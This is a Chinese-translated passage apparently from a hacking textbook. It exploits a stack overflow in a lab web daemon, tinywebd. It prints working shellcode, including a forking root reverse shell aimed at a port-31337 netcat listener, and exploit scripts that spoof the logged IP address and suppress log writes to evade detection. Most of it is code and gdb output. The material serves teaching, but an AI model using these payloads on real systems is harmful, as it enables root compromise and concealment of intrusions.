0x08049312 <handle_connection+857>:     mov    DWORD PTR [esp],eax
0x08049315 <handle_connection+860>:     call   0x8048800 <shutdown@plt>
`0x0804931a <handle_connection+865>:     add    esp,0x644 0x08049320 <handle_connection+871>:     pop    ebx 0x08049321 <handle_connection+872>:     pop    ebp 0x08049322 <handle_connection+873>:     ret`
End of assembler dump.
(gdb)

函数开始时，函数前缀通过将它们压入堆栈来保存 EBP 和 EBX 寄存器的当前值，并将 EBP 设置为 ESP 的当前值，以便它可以作为访问堆栈变量的参考点。最后，通过从 ESP 减去 0x644 字节来在堆栈上保存这些堆栈变量。函数后缀在末尾通过将 0x644 加回到 ESP 中来恢复 ESP，并通过从堆栈中弹出保存的 EBX 和 EBP 的值来恢复寄存器中的保存值。

覆盖指令实际上位于 recv_line() 函数中；然而，它们写入 handle_connection() 堆栈帧中的数据，因此覆盖本身发生在 handle_connection() 中。当我们调用 handle_connection() 时，我们覆盖的返回地址被压入堆栈，因此函数前缀中压入堆栈的 EBP 和 EBX 的保存值将位于返回地址和可破坏缓冲区之间。这意味着当函数后缀执行时，EBP 和 EBX 将被破坏。由于我们直到返回指令才获得程序的执行控制权，因此必须在覆盖和返回指令之间的所有指令都必须执行。首先，我们需要评估这些额外的指令在覆盖之后造成的附带损害有多大。汇编指令 int3 创建了字节 0xcc，这实际上是调试断点。下面的 Shellcode 使用 int3 指令而不是退出。这个断点将被 GDB 捕获，允许我们检查 Shellcode 执行后的程序的确切状态。

mark_break.s

BITS 32
; Mark the filesystem to prove you ran.
   jmp short one
   two:
   pop ebx              ; Filename
   xor ecx, ecx
   mov BYTE [ebx+7], cl ; Null terminate filename
   push BYTE 0x5        ; Open()
   pop eax
   mov WORD cx, 0x441   ; O_WRONLY|O_APPEND|O_CREAT
   xor edx, edx
   mov WORD dx, 0x180   ; S_IRUSR|S_IWUSR
   int 0x80             ; Open file to create it.
      ; eax = returned file descriptor
   mov ebx, eax         ; File descriptor to second arg0
   push BYTE 0x6        ; Close ()
   pop eax
   int 0x80  ; Close file.

   int3   ; zinterrupt
one:
   call two
db "/HackedX"

要使用此 Shellcode，首先设置 GDB 以调试 tinyweb 守护进程。下面的输出中，在调用 handle_connection() 之前设置了一个断点。目标是恢复在断点处找到的原始状态破坏的寄存器。

reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ ps aux | grep tinywebd
root     23497  0.0  0.0   1636   356 ?        Ss   17:08   0:00 ./tinywebd
reader   23506  0.0  0.0   2880   748 pts/1    R+   17:09   0:00 grep tinywebd
reader@hacking:~/booksrc $ gcc -g tinywebd.c
reader@hacking:~/booksrc $ sudo gdb -q -pid=23497 --symbols=./a.out

warning: not using untrusted file "/home/reader/.gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Attaching to process 23497
/cow/home/reader/booksrc/tinywebd: No such file or directory.
A program is being debugged already.  Kill it? (y or n) n
Program not killed.
(gdb) set dis intel
(gdb) x/5i main+533
0x8048fa8 <main+533>:   mov    DWORD PTR [esp+4],eax
0x8048fac <main+537>:   mov    eax,DWORD PTR [ebp-12]
0x8048faf <main+540>:   mov    DWORD PTR [esp],eax
`0x8048fb2 <main+543>:   call   0x8048fb9 <handle_connection>`
0x8048fb7 <main+548>:   jmp    0x8048f65 <main+466>
(gdb) break *0x8048fb2
Breakpoint 1 at 0x8048fb2: file tinywebd.c, line 72.
(gdb) cont
Continuing.

在上面的输出中，在调用handle_connection()之前设置了一个断点（用粗体显示）。然后，在另一个终端窗口中，使用攻击工具将新的 shellcode 投掷给它。这将使执行推进到另一个终端中的断点。

reader@hacking:~/booksrc $ nasm mark_break.s
reader@hacking:~/booksrc $ ./xtool_tinywebd.sh mark_break 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_break (44 bytes)
[NOP (372 bytes)] [shellcode (44 bytes)] [ret addr (128 bytes)]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $

回到调试终端，遇到了第一个断点。一些重要的栈寄存器被显示出来，它们显示了在调用handle_connection()之前（和之后）的栈设置。然后，执行继续到 shellcode 中的int3指令，它就像一个断点。然后再次检查这些栈寄存器，以查看 shellcode 开始执行时的状态。

Breakpoint 1, 0x08048fb2 in main () at tinywebd.c:72
72            handle_connection(new_sockfd, &client_addr, logfd);
(gdb) i r esp ebx ebp
esp            0xbffff7e0       0xbffff7e0
ebx            0xb7fd5ff4       -1208131596
ebp            0xbffff848       0xbffff848
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff753 in ?? ()
(gdb) i r esp ebx ebp
esp            0xbffff7e0       0xbffff7e0
ebx            0x6      6
ebp            0xbffff624       0xbffff624
(gdb)

这个输出显示，在 shellcode 开始执行时，EBX 和 EBP 发生了变化。然而，检查main()反汇编中的指令显示，实际上并没有使用 EBX。编译器可能由于某些关于调用约定的规则而将此寄存器保存到栈上，尽管实际上并没有使用。然而，EBP 被大量使用，因为它是所有局部栈变量的参考点。由于原始的 EBP 保存值被我们的攻击覆盖，必须重新创建原始值。当 EBP 恢复到原始值时，shellcode 应该能够完成其肮脏的工作，然后像往常一样返回到main()。由于计算机是确定性的，汇编指令将清楚地解释如何完成所有这些。

(gdb) set dis intel
(gdb) x/5i main
0x8048d93 <main>:       push   ebp
0x8048d94 <main+1>:     mov    ebp,esp
0x8048d96 <main+3>:     sub    esp,0x68
0x8048d99 <main+6>:     and    esp,0xfffffff0
0x8048d9c <main+9>:     mov    eax,0x0
(gdb) x/5i main+533
0x8048fa8 <main+533>:   mov    DWORD PTR [esp+4],eax
0x8048fac <main+537>:   mov    eax,DWORD PTR [ebp-12]
0x8048faf <main+540>:   mov    DWORD PTR [esp],eax
0x8048fb2 <main+543>:   call   0x8048fb9 <handle_connection>
`0x8048fb7 <main+548>:   jmp    0x8048f65 <main+466>`
(gdb)

快速查看main()函数的前置部分，可以看到 EBP 应该比 ESP 大0x68字节。由于 ESP 没有被我们的攻击损坏，我们可以在 shellcode 的末尾将0x68加到 ESP 上，以恢复 EBP 的值。EBP 恢复到正确的值后，程序执行可以安全地返回到连接接受循环。handle_connection()调用的正确返回地址是在0x08048fb7之后的指令。下面的 shellcode 使用了这种技术。

mark_restore.s

BITS 32
; Mark the filesystem to prove you ran.
   jmp short one
   two:
   pop ebx              ; Filename
   xor ecx, ecx
   mov BYTE [ebx+7], cl ; Null terminate filename
   push BYTE 0x5        ; Open()
   pop eax
   mov WORD cx, 0x441   ; O_WRONLY|O_APPEND|O_CREAT
   xor edx, edx
   mov WORD dx, 0x180   ; S_IRUSR|S_IWUSR
   int 0x80             ; Open file to create it.
      ; eax = returned file descriptor
   mov ebx, eax         ; File descriptor to second arg
   push BYTE 0x6        ; Close ()
   pop eax
   int 0x80  ; close file

   lea ebp, [esp+0x68]  ; Restore EBP.
   push 0x08048fb7      ; Return address.
   ret                  ; Return
one:
   call two
db "/HackedX"

当汇编并用于攻击时，这个 shellcode 将在标记文件系统后恢复 tinyweb 守护进程的执行。tinyweb 守护进程甚至不知道发生了什么。

reader@hacking:~/booksrc $ nasm mark_restore.s
reader@hacking:~/booksrc $ hexdump -C mark_restore
00000000  eb 26 5b 31 c9 88 4b 07  6a 05 58 66 b9 41 04 31  |.&[1.K.j.Xf.A.1|
00000010  d2 66 ba 80 01 cd 80 89  c3 6a 06 58 cd 80 8d 6c  |.f....j.X..l|
00000020  24 68 68 b7 8f 04 08 c3  e8 d5 ff ff ff 2f 48 61  |$hh...../Ha|
00000030  63 6b 65 64 58                                    |ckedX|
00000035
reader@hacking:~/booksrc $ sudo rm /Hacked
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ ./xtool_tinywebd_steath.sh mark_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (348 b)] [shellcode (53 b)] [ret addr (128 b)]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ ls -l /Hacked
-rw------- 1 root reader 0 2007-09-19 20:37 /Hacked
reader@hacking:~/booksrc $ ps aux | grep tinywebd
root     26787  0.0  0.0   1636   420 ?        Ss   20:37   0:00 ./tinywebd
reader   26828  0.0  0.0   2880   748 pts/1    R+   20:38   0:00 grep tinywebd
reader@hacking:~/booksrc $ ./webserver_id 127.0.0.1
The web server for 127.0.0.1 is Tiny webserver
reader@hacking:~/booksrc $

儿童劳工

现在难题已经解决，我们可以使用这个技术来静默地启动一个 root shell。由于 shell 是交互式的，但我们仍然希望进程处理 web 请求，因此我们需要进行进程的 fork。fork()调用创建了一个子进程，它是父进程的精确副本，除了在子进程中返回0，而在父进程中返回新的进程 ID。我们希望我们的 shellcode 能够 fork，并且子进程提供 root shell，而父进程恢复 tinywebd 的执行。在下面的 shellcode 中，loopback_shell.s 的开头添加了几条指令。首先，执行 fork 系统调用，并将返回值存入 EAX 寄存器。接下来的几条指令检查 EAX 是否为零。如果 EAX 为零，我们跳转到child_process以启动 shell。否则，我们处于父进程中，因此 shellcode 将执行恢复到 tinywebd。

loopback_shell_restore.s

BITS 32

   push BYTE 0x02    ; Fork is syscall #2
   pop eax
   int 0x80          ; After the fork, in child process eax == 0.
   test eax, eax
   jz child_process  ; In child process spawns a shell.

; In the parent process, restore tinywebd.
   lea ebp, [esp+0x68]  ; Restore EBP.
   push 0x08048fb7      ; Return address.
   ret                  ; Return

child_process:
; s = socket(2, 1, 0)
  push BYTE 0x66    ; Socketcall is syscall #102 (0x66)
  pop eax
  cdq               ; Zero out edx for use as a null DWORD later.
  xor ebx, ebx      ; ebx is the type of socketcall.
  inc ebx           ; 1 = SYS_SOCKET = socket()
  push edx          ; Build arg array: { protocol = 0,
  push BYTE 0x1     ;   (in reverse)     SOCK_STREAM = 1,
  push BYTE 0x2     ;                    AF_INET = 2 }
  mov ecx, esp      ; ecx = ptr to argument array
  int 0x80          ; After syscall, eax has socket file descriptor.
 .: [ Output trimmed; the rest is the same as loopback_shell.s. ] :.

以下列表显示了此 shellcode 的使用情况。使用多个作业而不是多个终端，因此将 netcat 监听器通过在命令末尾添加一个&符号发送到后台。在 shell 连接回来后，fg命令将监听器带回前台。然后通过按 CTRL-Z 挂起进程，返回到 BASH shell。您可能更容易使用多个终端来跟随，但了解作业控制对于您没有多个终端的奢侈情况是有用的。

reader@hacking:~/booksrc $ nasm loopback_shell_restore.s
reader@hacking:~/booksrc $ hexdump -C loopback_shell_restore
00000000  6a 02 58 cd 80 85 c0 74  0a 8d 6c 24 68 68 b7 8f  |j.X..t.l$hh.|
00000010  04 08 c3 6a 66 58 99 31  db 43 52 6a 01 6a 02 89  |..jfX.1.CRj.j.|
00000020  e1 cd 80 96 6a 66 58 43  68 7f bb bb 01 66 89 54  |..jfXCh..f.T|
00000030  24 01 66 68 7a 69 66 53  89 e1 6a 10 51 56 89 e1  |$.fhzifS.j.QV.|
00000040  43 cd 80 87 f3 87 ce 49  b0 3f cd 80 49 79 f9 b0  |C...I.?.Iy.|
00000050  0b 52 68 2f 2f 73 68 68  2f 62 69 6e 89 e3 52 89  |.Rh//shh/bin.R.|
00000060  e2 53 89 e1 cd 80                                 |.S..|
00000066
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ nc -l -p 31337 &
[1] 27279
reader@hacking:~/booksrc $ ./xtool_tinywebd_steath.sh loopback_shell_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: loopback_shell_restore (102 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (299 b)] [shellcode (102 b)] [ret addr (128 b)]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ fg
nc -l -p 31337
whoami
root

[1]+  Stopped                 nc -l -p 31337
reader@hacking:~/booksrc $ ./webserver_id 127.0.0.1
The web server for 127.0.0.1 is Tiny webserver
reader@hacking:~/booksrc $ fg
nc -l -p 31337
whoami
root

使用此 shellcode，连接回的 root shell 由一个单独的子进程维护，而父进程继续提供 web 内容。

高级伪装

我们当前的隐蔽漏洞仅伪装了 web 请求；然而，IP 地址和时间戳仍然被写入日志文件。这种伪装会使攻击更难被发现，但它们并不是无形的。如果您的 IP 地址被写入可能保存多年的日志，可能会在未来引起麻烦。由于我们现在正在处理 tinyweb 守护进程的内部，我们应该能够更好地隐藏我们的存在。

伪造记录的 IP 地址

写入日志文件的 IP 地址来自client_addr_ptr，它被传递给handle_connection()。

tinywebd.c 的代码段

void handle_connection(int sockfd, struct sockaddr_in *`client_addr_ptr,` int logfd) {
   unsigned char *ptr, request[500], resource[500], log_buffer[500];
   int fd, length;

   length = recv_line(sockfd, request);

   sprintf(log_buffer, "From %s:%d \"%s\"\t", inet_ntoa(`client_addr_ptr->sin_addr`),
ntohs(`client_addr_ptr->sin_port`), request);

要伪造 IP 地址，我们只需要注入我们自己的sockaddr_in结构，并用注入结构的地址覆盖client_addr_ptr。生成用于注入的sockaddr_in结构的最佳方式是编写一个小型的 C 程序来创建和转储该结构。以下源代码使用命令行参数构建结构，然后将结构数据直接写入文件描述符 1，即标准输出。

addr_struct.c

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(int argc, char *argv[]) {
   struct sockaddr_in addr;
   if(argc != 3) {
      printf("Usage: %s <target IP> <target port>\n", argv[0]);
      exit(0);
   }
   addr.sin_family = AF_INET;
   addr.sin_port = htons(atoi(argv[2]));
   addr.sin_addr.s_addr = inet_addr(argv[1]);

   write(1, &addr, sizeof(struct sockaddr_in));
}

该程序可以用来注入一个sockaddr_in结构。下面的输出显示了程序被编译和执行的情况。

reader@hacking:~/booksrc $ gcc -o addr_struct addr_struct.c
reader@hacking:~/booksrc $ ./addr_struct 12.34.56.78 9090
##
   "8N_reader@hacking:~/booksrc $
reader@hacking:~/booksrc $ ./addr_struct 12.34.56.78 9090 | hexdump -C
00000000  02 00 23 82 0c 22 38 4e  00 00 00 00 f4 5f fd b7  |.#."8N..._.|
00000010
reader@hacking:~/booksrc $

为了将此集成到我们的利用中，在伪造请求之后但在 NOP sled 之前注入地址结构。由于伪造请求长度为 15 字节，而我们知道缓冲区从0xbffff5c0开始，因此伪造的地址将在0xbfffff5cf处注入。

reader@hacking:~/booksrc $ grep 0x xtool_tinywebd_steath.sh
RETADDR="\x24\xf6\xff\xbf" # at +100 bytes from buffer @ 0xbffff5c0
reader@hacking:~/booksrc $ gdb -q -batch -ex "p /x 0xbffff5c0 + 15"
$1 = 0xbffff5cf
reader@hacking:~/booksrc $

由于client_addr_ptr作为第二个函数参数传递，它将在返回地址后的堆栈上两个 dwords 处。下面的利用脚本注入一个伪造的地址结构并覆盖client_addr_ptr。

xtool_tinywebd_spoof.sh

#!/bin/sh
# IP spoofing stealth exploitation tool for tinywebd

SPOOFIP="12.34.56.78"
SPOOFPORT="9090"

if [ -z "$2" ]; then # If argument 2 is blank
   echo "Usage: $0 <shellcode file> <target IP>"
   exit
fi
FAKEREQUEST="GET / HTTP/1.1\x00"
FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ')
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # At +100 bytes from buffer @ 0xbffff5c0
FAKEADDR="\xcf\xf5\xff\xbf" # +15 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE - 16))

echo "[Fake Request $FR_SIZE] [spoof IP 16] [NOP $ALIGNED_SLED_SIZE] [shellcode $SIZE]
 [ret
addr 128] [*fake_addr 8]"
(perl -e "print \"$FAKEREQUEST\"";
 ./addr_struct "$SPOOF IP" "$SPOOFPORT";
 perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
 cat $1;
perl -e "print \"$RETADDR\"x32 . \"$FAKEADDR\"x2 . \"\r\n\"") | nc -w 1 -v $2 80

解释这个利用脚本确切做什么的最好方法是使用 GDB 从内部观察 tinywebd。在下面的输出中，GDB 用于附加到正在运行的 tinywebd 进程，在溢出之前设置断点，并生成日志缓冲区的 IP 部分。

reader@hacking:~/booksrc $ ps aux | grep tinywebd
root     27264  0.0  0.0   1636   420 ?        Ss   20:47   0:00 ./tinywebd
reader   30648  0.0  0.0   2880   748 pts/2    R+   22:29   0:00 grep tinywebd
reader@hacking:~/booksrc $ gcc -g tinywebd.c
reader@hacking:~/booksrc $ sudo gdb -q—pid=27264 --symbols=./a.out

warning: not using untrusted file "/home/reader/.gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Attaching to process 27264
/cow/home/reader/booksrc/tinywebd: No such file or directory.
A program is being debugged already. Kill it? (y or n) n
Program not killed.
(gdb) list handle_connection
77      /* This function handles the connection on the passed socket from the
78       * passed client address and logs to the passed FD. The connection is
79       * processed as a web request, and this function replies over the connected
80       * socket. Finally, the passed socket is closed at the end of the function.
81       */
82      void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd)
 {
83         unsigned char *ptr, request[500], resource[500], log_buffer[500];
84         int fd, length;
85
86         length = recv_line(sockfd, request);
(gdb)
87
88         sprintf(log_buffer, "From %s:%d \"%s\"\t", inet_ntoa(client_addr_ptr->sin_addr),
ntohs(client_addr_ptr->sin_port), request);
89
90         ptr = strstr(request, " HTTP/"); // Search for valid looking request.
91         if(ptr == NULL) { // Then this isn't valid HTTP
92            strcat(log_buffer, " NOT HTTP!\n");
93         } else {
94            *ptr = 0; // Terminate the buffer at the end of the URL.
95            ptr = NULL; // Set ptr to NULL (used to flag for an invalid request).
96            if(strncmp(request, "GET ", 4) == 0)  // Get request
(gdb) break 86
Breakpoint 1 at 0x8048fc3: file tinywebd.c, line 86.
(gdb) break 89
Breakpoint 2 at 0x8049028: file tinywebd.c, line 89.
(gdb) cont
Continuing.

然后，在另一个终端中，使用新的欺骗利用来在调试器中推进执行。

reader@hacking:~/booksrc $ ./xtool_tinywebd_spoof.sh mark_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 332] [shellcode 53] [ret addr 128]
[*fake_addr 8]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $

在调试终端中，第一个断点被触发。

Breakpoint 1, handle_connection (sockfd=9, client_addr_ptr=0xbffff810, logfd=3) at
tinywebd.c:86
86         length = recv_line(sockfd, request);
(gdb) bt
#0  handle_connection (sockfd=9, client_addr_ptr=0xbffff810, logfd=3) at tinywebd.c:86
#1  0x08048fb7 in main () at tinywebd.c:72
(gdb) print client_addr_ptr
$1 = (struct sockaddr_in *) 0xbffff810
(gdb) print *client_addr_ptr
$2 = {sin_family = 2, sin_port = 15284, sin_addr = {s_addr = 16777343},
sin_zero = "\000\000\000\000\000\000\000"}
(gdb) x/x &client_addr_ptr
0xbffff7e4:     0xbffff810
(gdb) x/24x request + 500
0xbffff7b4:     0xbffff624      0xbffff624      0xbffff624      0xbffff624
0xbffff7c4:     0xbffff624      0xbffff624      0x0804b030      0xbffff624
0xbffff7d4:     0x00000009      0xbffff848      0x08048fb7      0x00000009
`0xbffff7e4:     0xbffff810`      0x00000003      0xbffff838      0x00000004
0xbffff7f4:     0x00000000      0x00000000      0x08048a30      0x00000000
0xbffff804:     0x0804a8c0      0xbffff818      0x00000010      0x3bb40002
(gdb) cont
Continuing.

Breakpoint 2, handle_connection (sockfd=-1073744433, client_addr_ptr=0xbffff5cf, 
logfd=2560)
at tinywebd.c:90
90         ptr = strstr(request, " HTTP/"); // Search for valid-looking request.
(gdb) x/24x request + 500
0xbffff7b4:     0xbffff624      0xbffff624      0xbffff624      0xbffff624
0xbffff7c4:     0xbffff624      0xbffff624      0xbffff624      0xbffff624
0xbffff7d4:     0xbffff624      0xbffff624      0xbffff624      0xbffff5cf
`0xbffff7e4:     0xbffff5cf`      0x00000a00      0xbffff838      0x00000004
0xbffff7f4:     0x00000000      0x00000000      0x08048a30      0x00000000
0xbffff804:     0x0804a8c0      0xbffff818      0x00000010      0x3bb40002
(gdb) print client_addr_ptr
$3 = (struct sockaddr_in *) 0xbffff5cf
(gdb) print client_addr_ptr
$4 = (struct sockaddr_in *) 0xbffff5cf
(gdb) print *client_addr_ptr
$5 = {sin_family = 2, sin_port = 33315, sin_addr = {s_addr = 1312301580},
sin_zero = "\000\000\000\000_
(gdb) x/s log_buffer
0xbffff1c0:      "From 12.34.56.78:9090 \"GET / HTTP/1.1\"\t"
(gdb)

在第一个断点处，client_addr_ptr显示为位于0xbffff7e4并指向0xbffff810。这在返回地址后的堆栈上的内存中找到，距离返回地址两个 dwords。第二个断点是在覆盖之后，因此client_addr_ptr在0xbffff7e4处被显示为被覆盖为注入的sockaddr_in结构地址0xbffff5cf。从这里，我们可以在写入日志之前查看log_buffer以验证地址注入是否成功。

无日志利用

理想情况下，我们希望完全不留下任何痕迹。在 LiveCD 的设置中，技术上你可以在获得 root shell 后直接删除日志文件。然而，让我们假设这个程序是安全基础设施的一部分，其中日志文件被镜像到一个具有最小访问权限或甚至可能是一个行式打印机的安全日志服务器。在这些情况下，在事后删除日志文件不是一种选择。tinyweb 守护进程中的timestamp()函数试图通过直接写入一个打开的文件描述符来提高安全性。我们无法阻止调用此函数，也无法撤销它对日志文件所做的写入。这将是一个相当有效的对策；然而，它的实现并不好。实际上，在前一个利用中，我们偶然发现了这个问题。

尽管logfd是一个全局变量，但它也被作为函数参数传递给handle_connection()。从功能上下文的讨论中，你应该记得这会创建另一个具有相同名称的堆栈变量，logfd。由于这个参数在堆栈上紧接在client_addr_ptr之后，它被 null 终止符和在利用缓冲区末尾发现的额外的0x0a字节部分覆盖。

(gdb) x/xw &client_addr_ptr
0xbffff7e4:     0xbffff5cf
(gdb) x/xw &logfd
0xbffff7e8:     0x00000a00
(gdb) x/4xb &logfd
0xbffff7e8:     0x00    0x0a    0x00    0x00
(gdb) x/8xb &client_addr_ptr
0xbffff7e4:     0xcf    0xf5    0xff    0xbf    0x00    0x0a    0x00    0x00
(gdb) p logfd
$6 = 2560
(gdb) quit
The program is running.  Quit anyway (and detach it)? (y or n) y
Detaching from program: , process 27264
reader@hacking:~/booksrc $ sudo kill 27264
reader@hacking:~/booksrc $

使用 strace 快速探索这个效果。在下面的输出中，strace 使用 -p 命令行参数附加到一个正在运行的过程。-e trace=write 参数告诉 strace 只查看写入调用。再次使用另一个终端中的伪造漏洞利用工具来连接并推进执行。

reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ ps aux | grep tinywebd
root       478  0.0  0.0   1636   420 ?        Ss   23:24   0:00 ./tinywebd
reader     525  0.0  0.0   2880   748 pts/1    R+   23:24   0:00 grep tinywebd
reader@hacking:~/booksrc $ sudo strace -p 478 -e trace=write
Process 478 attached - interrupt to quit
write(2560, "09/19/2007 23:29:30> ", 21) = -1 EBADF (Bad file descriptor)
write(2560, "From 12.34.56.78:9090 \"GET / HTT".., 47) = -1 EBADF (Bad file descriptor)
Process 478 detached
reader@hacking:~/booksrc $

这个输出清楚地显示了尝试写入日志文件失败的情况。通常情况下，我们无法覆盖 logfd 变量，因为 client_addr_ptr 在路上。粗心大意地篡改这个指针通常会导致崩溃。但既然我们已经确保这个变量指向有效的内存（我们注入的伪造地址结构），我们就自由地覆盖它之后的变量。由于 tinyweb 守护进程将标准输出重定向到 /dev/null，下一个漏洞利用脚本将覆盖传递的 logfd 变量，使其为 1，用于标准输出。这仍然会阻止条目写入日志文件，但方式更加优雅——没有错误。

xtool_tinywebd_silent.sh

#!/bin/sh
# Silent stealth exploitation tool for tinywebd
#    also spoofs IP address stored in memory

SPOOFIP="12.34.56.78"
SPOOFPORT="9090"

if [ -z "$2" ]; then # If argument 2 is blank
   echo "Usage: $0 <shellcode file> <target IP>"
   exit
fi
FAKEREQUEST="GET / HTTP/1.1\x00"
FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ')
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # At +100 bytes from buffer @ 0xbffff5c0
FAKEADDR="\xcf\xf5\xff\xbf" # +15 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE - 16))

echo "[Fake Request $FR_SIZE] [spoof IP 16] [NOP $ALIGNED_SLED_SIZE] [shellcode $SIZE] 
[ret
addr 128] [*fake_addr 8]"
(perl -e "print \"$FAKEREQUEST\"";
 ./addr_struct "$SPOOFIP" "$SPOOFPORT";
 perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
 cat $1;
perl -e "print \"$RETADDR\"x32 . \"$FAKEADDR\"x2 . \"\x01\x00\x00\x00\r\n\"") | nc -w 1
 -v $2
80

当使用此脚本时，漏洞利用是完全静默的，并且不会将任何内容写入日志文件。

reader@hacking:~/booksrc $ sudo rm /Hacked
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon..
reader@hacking:~/booksrc $ ls -l /var/log/tinywebd.log
-rw------- 1 root reader 6526 2007-09-19 23:24 /var/log/tinywebd.log
reader@hacking:~/booksrc $ ./xtool_tinywebd_silent.sh mark_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 332] [shellcode 53] [ret addr 128] [*fake_addr 8]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ ls -l /var/log/tinywebd.log
-rw------- 1 root reader 6526 2007-09-19 23:24 /var/log/tinywebd.log
reader@hacking:~/booksrc $ ls -l /Hacked
-rw------- 1 root reader 0 2007-09-19 23:35 /Hacked
reader@hacking:~/booksrc $

注意日志文件的大小和访问时间保持不变。使用这种技术，我们可以利用 tinywebd 而不会在日志文件中留下任何痕迹。此外，写入调用执行得干净利落，因为所有内容都写入到 /dev/null。这通过下面的输出中的 strace 显示出来，当在另一个终端中运行静默漏洞利用工具时。

reader@hacking:~/booksrc $ ps aux | grep tinywebd
root       478  0.0 0.0    1636   420 ?        Ss   23:24   0:00 ./tinywebd
reader    1005  0.0 0.0    2880   748 pts/1    R+   23:36   0:00 grep tinywebd
reader@hacking:~/booksrc $ sudo strace -p 478 -e trace=write
Process 478 attached - interrupt to quit
write(1, "09/19/2007 23:36:31> ", 21)   = 21
write(1, "From 12.34.56.78:9090 \"GET / HTT".., 47) = 47
Process 478 detached
reader@hacking:~/booksrc $

整个基础设施

总是如此，细节可能隐藏在更大的画面中。单个主机通常存在于某种基础设施中。如入侵检测系统（IDS）和入侵预防系统（IPS）之类的对策可以检测异常网络流量。即使是路由器和防火墙上的简单日志文件也可能揭示出异常连接，这些连接表明了入侵。特别是，我们用于连接回 shellcode 的端口 31337 是一个明显的红旗。我们可以将其更改为看起来不那么可疑的端口；然而，仅仅有一个 web 服务器打开出站连接本身就可能是红旗。一个高度安全的设施甚至可能配置了防火墙出口过滤器来防止出站连接。在这些情况下，打开新的连接要么是不可能的，要么会被检测到。

Socket 重用

在我们的情况下，实际上没有必要打开一个新的连接，因为我们已经从网络请求中获得了打开的套接字。由于我们在 tinyweb 守护进程内部捣鼓，通过一点调试，我们可以重用现有的套接字来获取 root shell。这防止了额外的 TCP 连接被记录，并允许在目标主机无法打开出站连接的情况下进行利用。请查看下面的 tinywebd.c 源代码。

tinywebd.c 的摘录

   while(1) { // Accept loop
      sin_size = sizeof(struct sockaddr_in);
      new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
      if(new_sockfd == -1)
         fatal("accepting connection");

      handle_connection(new_sockfd, &client_addr, logfd);
   }
   return 0;
}

/* This function handles the connection on the passed socket from the
 * passed client address and logs to the passed FD. The connection is
 * processed as a web request, and this function replies over the connected
 * socket. Finally, the passed socket is closed at the end of the function.
 */
void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd) {
   unsigned char *ptr, request[500], resource[500], log_buffer[500];
   int fd, length;

   length = recv_line(sockfd, request);

不幸的是，传递给 handle_connection() 的 sockfd 将不可避免地被覆盖，因此我们可以覆盖 logfd。这种覆盖发生在我们通过 shellcode 控制程序之前，所以无法恢复 sockfd 的原始值。幸运的是，main() 函数在 new_sockfd 中保留了套接字的文件描述符的另一个副本。

reader@hacking:~/booksrc $ ps aux | grep tinywebd
root       478  0.0  0.0   1636   420 ?        Ss   23:24   0:00 ./tinywebd
reader    1284  0.0  0.0   2880   748 pts/1    R+   23:42   0:00 grep tinywebd
reader@hacking:~/booksrc $ gcc -g tinywebd.c
reader@hacking:~/booksrc $ sudo gdb -q-pid=478 --symbols=./a.out
warning: not using untrusted file "/home/reader/.gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Attaching to process 478
/cow/home/reader/booksrc/tinywebd: No such file or directory.
A program is being debugged already. Kill it? (y or n) n
Program not killed.
(gdb) list handle_connection
77      /* This function handles the connection on the passed socket from the
78       * passed client address and logs to the passed FD. The connection is
79       * processed as a web request, and this function replies over the connected
80       * socket. Finally, the passed socket is closed at the end of the function.
81       */
82      void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd)
 {
